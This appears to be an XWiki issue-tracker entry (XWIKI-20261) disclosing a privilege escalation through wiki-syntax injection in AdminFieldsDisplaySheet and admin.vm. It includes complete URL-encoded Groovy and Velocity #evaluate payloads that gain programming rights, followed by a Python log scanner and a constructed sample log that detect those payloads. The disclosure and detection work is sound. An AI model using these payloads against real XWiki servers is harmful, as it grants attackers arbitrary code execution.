XWiki Platform - XWIKI-20261

Privilege escalation (PR) from account/view through AdminFieldsDisplaySheet and admin.vm


    Description

      Steps to reproduce:

      1. Add
        {{template name="admin.vm" output="false"/}}
        
        {{display reference="XWiki.AdminFieldsDisplaySheet"/}}

        to any place where you can use wiki syntax like the "about" section in your user profile as a user without programming or script rights.

      2. Add the URL parameter section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D.

      Expected results:

      Some errors or nothing is displayed.

      Actual result:

      hello from groovy! followed by some raw HTML is displayed.

      This shows that a user without script or programming rights can execute a Groovy macro and thus in principle gain programming rights. There is a caveat: the executed code is first converted to lowercase. While this means much of the API is not available, there are workarounds like using

      {{velocity}}#evaluate($request.exploit){{/velocity}}

      as main exploit code and thus executing the content of a request parameter. A fully working set of parameters would be

      section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%2Crequest.exploit%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate%28%24request.exploit%29%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D&exploit=Hello+from+Velocity%21+%24hasProgramming

      which results in the output Hello from Velocity! true, thus showing that we have programming rights in Velocity and no more restrictions. Without escaping, the corresponding parameter values are

      {{/html}} {{async async="true" cached="false" context="doc.reference,request.exploit"}}{{velocity}}#evaluate($request.exploit){{/velocity}}{{/async}}

      for section and

      Hello from Velocity! $hasProgramming

      for exploit.

      This exploit is possible because XWiki.AdminFieldsDisplaySheet outputs $section (and other variables) without further escaping, thus allowing XWiki syntax injection, and admin.vm can be abused to set $section from the section request parameter.
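      Because the root cause is that request parameters reach the sheet unescaped, a defender can spot abuse of this issue in the access logs: a legitimate value of the section parameter is a plain section name, so any parameter carrying wiki macro delimiters ({{ ... }}) or a Velocity #evaluate call is a strong indicator. The following detection script is an added example for this issue, not code from XWiki; the log line format and the user names in it are constructed, and the only real inputs are the URL-encoded payload shapes from the steps above.

```python
"""Detect XWiki-syntax injection attempts in request parameters (XWIKI-20261).

Added example, not XWiki's own code. The log format below
('METHOD PATH?QUERY STATUS') and the user names are constructed.
"""
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import parse_qs, urlsplit

# Markers that never appear in a legitimate admin section name:
# wiki macro delimiters and the Velocity #evaluate directive.
INJECTION_MARKERS = re.compile(r"\{\{|\}\}|#evaluate\s*\(", re.IGNORECASE)


@dataclass
class Finding:
    path: str   # request path, e.g. /xwiki/bin/view/XWiki/Mallory
    param: str  # offending query parameter name
    value: str  # URL-decoded parameter value


def is_suspicious(value: str) -> bool:
    """True if a decoded parameter value contains wiki-syntax injection markers."""
    return INJECTION_MARKERS.search(value) is not None


def scan_request(path_and_query: str) -> List[Finding]:
    """Decode every query parameter of one request and return the suspicious ones."""
    parts = urlsplit(path_and_query)
    findings = []
    # parse_qs performs the same percent-decoding and '+' -> space
    # translation the servlet container applies before XWiki sees the value.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for v in values:
            if is_suspicious(v):
                findings.append(Finding(parts.path, name, v))
    return findings


def scan_log(text: str) -> List[Finding]:
    """Scan constructed 'METHOD PATH?QUERY STATUS' lines; malformed lines are skipped."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        findings.extend(scan_request(fields[1]))
    return findings


# Constructed sample log: two benign admin requests, one unrelated page view,
# and two requests carrying the Velocity and Groovy payload shapes from the issue.
SAMPLE_LOG = """\
GET /xwiki/bin/view/XWiki/Alice?section=Users 200
GET /xwiki/bin/view/XWiki/Mallory?section=%7B%7B%2Fhtml%7D%7D+%7B%7Bvelocity%7D%7D%23evaluate%28%24request.exploit%29%7B%7B%2Fvelocity%7D%7D&exploit=%24hasProgramming 200
GET /xwiki/bin/view/Main/WebHome 200
GET /xwiki/bin/view/XWiki/Bob?section=General&editor=globaladmin 200
GET /xwiki/bin/view/XWiki/Mallory?section=%7B%7Basync+async%3D%22true%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hi%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D 200
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"suspicious {f.param!r} on {f.path}: {f.value}")
```

      The scanner decodes before matching, which matters because the raw log line only shows %7B%7B; matching on the encoded form would miss a client that sends the braces literally. It deliberately does not flag the exploit parameter in the second line, since a bare $hasProgramming is only dangerous once #evaluate is reached, and that call is what the section parameter check catches.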

      People: mleduc Manuel Leduc; MichaelHamann Michael Hamann